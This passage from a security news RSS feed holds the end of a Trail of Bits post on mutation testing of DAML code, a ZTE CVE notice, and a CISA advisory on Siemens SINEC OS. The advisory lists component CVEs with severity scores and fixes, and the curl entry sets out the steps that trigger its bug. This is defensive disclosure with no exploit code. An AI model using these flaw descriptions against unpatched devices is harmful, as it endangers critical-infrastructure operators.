<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Tried It: This Magic Trick Gives Stainless-Steel Frying Pans a Nonstick Patina]]></title>
<description><![CDATA[Sticky eggs and pancakes are typically relegated to ceramic or Teflon cookware. Not so with this nifty nonstick hack.]]></description>
<link>https://tsecurity.de/de/3653873/it-nachrichten/i-tried-it-this-magic-trick-gives-stainless-steel-frying-pans-a-nonstick-patina/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653873/it-nachrichten/i-tried-it-this-magic-trick-gives-stainless-steel-frying-pans-a-nonstick-patina/</guid>
<pubDate>Wed, 08 Jul 2026 11:47:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sticky eggs and pancakes are typically relegated to ceramic or Teflon cookware. Not so with this nifty nonstick hack.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-40002 | ZTE Red Magic 11 Pro up to V1.0.0B14MR1 Service Interface privileges management]]></title>
<description><![CDATA[A vulnerability was found in ZTE Red Magic 11 Pro up to V1.0.0B14MR1 and classified as critical. Affected by this issue is some unknown functionality of the component Service Interface. Such manipulation leads to improper privilege management.

This vulnerability is referenced as CVE-2026-40002. ...]]></description>
<link>https://tsecurity.de/de/3653214/sicherheitsluecken/cve-2026-40002-zte-red-magic-11-pro-up-to-v100b14mr1-service-interface-privileges-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653214/sicherheitsluecken/cve-2026-40002-zte-red-magic-11-pro-up-to-v100b14mr1-service-interface-privileges-management/</guid>
<pubDate>Wed, 08 Jul 2026 06:24:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/zte:red_magic_11_pro">ZTE Red Magic 11 Pro up to V1.0.0B14MR1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>Service Interface</em>. Such manipulation leads to improper privilege management.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-40002">CVE-2026-40002</a>. The attack can only be performed from a local environment. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Siemens SINEC OS]]></title>
<description><![CDATA[View CSAF
Summary
SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.
The following versions of Siemens SINEC OS are affected:

RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/cork. The "*...]]></description>
<link>https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-05.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.</strong></p>
<p>The following versions of Siemens SINEC OS are affected:</p>
<ul>
<li>RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/&lt;4.0 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>Siemens</td>
<td>Siemens SINEC OS</td>
<td>Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Resource Shutdown or Release, Integer Overflow or Wraparound, Stack-based Buffer Overflow, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Uncontrolled Recursion, Out-of-bounds Read, Covert Timing Channel, Improper Input Validation, Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'), Improper Update of Reference Count, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), Multiple Releases of Same Resource or Handle, Permissive Regular Expression, Expired Pointer Dereference, Incorrect Bitwise Shift of Integer, Out-of-bounds Write, User Interface (UI) Misrepresentation of Critical Information, Improper Access Control, Insertion of Sensitive Information Into Sent Data, Inefficient Algorithmic Complexity, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Authentication Bypass by Primary Weakness, NULL Pointer Dereference, Active Debug Code, Loop with Unreachable Exit Condition ('Infinite Loop'), Missing Synchronization, External Control of File Name or Path, Privilege Dropping / Lowering Errors, Use of Web Browser Cache Containing Sensitive Information</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing, Transportation Systems, Energy, Healthcare and Public Health, Financial Services, Government Services and Facilities</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1352</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU elfutils 0.192 and classified as critical. This vulnerability affects the function __libdw_thread_tail in the library libdw_alloc.c of the component eu-readelf. The manipulation of the argument w leads to memory corruption. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is 2636426a091bd6c6f7f02e49ab20d4cdc6bfc753. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1352">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1376</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1376">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404 Improper Resource Shutdown or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6052</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6052">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6141</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU ncurses up to 6.5-20250322 and classified as problematic. This vulnerability affects the function postprocess_termcap of the file tinfo/parse_entry.c. The manipulation leads to stack-based buffer overflow. The attack needs to be approached locally. Upgrading to version 6.5-20250329 is able to address this issue. It is recommended to upgrade the affected component.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6141">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6170</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6170">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-7039</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-7039">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-8732</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2 up to 2.14.5. It has been declared as problematic. This vulnerability affects the function xmlParseSGMLCatalog of the component xmlcatalog. The manipulation leads to uncontrolled recursion. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The code maintainer explains, that "[t]he issue can only be triggered with untrusted SGML catalogs and it makes absolutely no sense to use untrusted catalogs. I also doubt that anyone is still using SGML catalogs at all."</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-8732">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9086</a></h3>
<div class="csaf-accordion-content">
<p>1. A cookie is set using the `secure` keyword for `https://target` 2. curl is redirected to or otherwise made to speak with `http://target` (same hostname, but using clear text HTTP) using the same cookie set 3. The same cookie name is set - but with just a slash as path (`path=\"/\",`). Since this site is not secure, the cookie *should* just be ignored. 4. A bug in the path comparison logic makes curl read outside a heap buffer boundary The bug either causes a crash or it potentially makes the comparison come to the wrong conclusion and lets the clear-text site override the contents of the secure cookie, contrary to expectations and depending on the memory contents immediately following the single-byte allocation that holds the path. The presumed and correct behavior would be to plainly ignore the second set of the cookie since it was already set as secure on a secure host so overriding it on an insecure host should not be okay.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9230</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9231</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/385.html">CWE-385 Covert Timing Channel</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
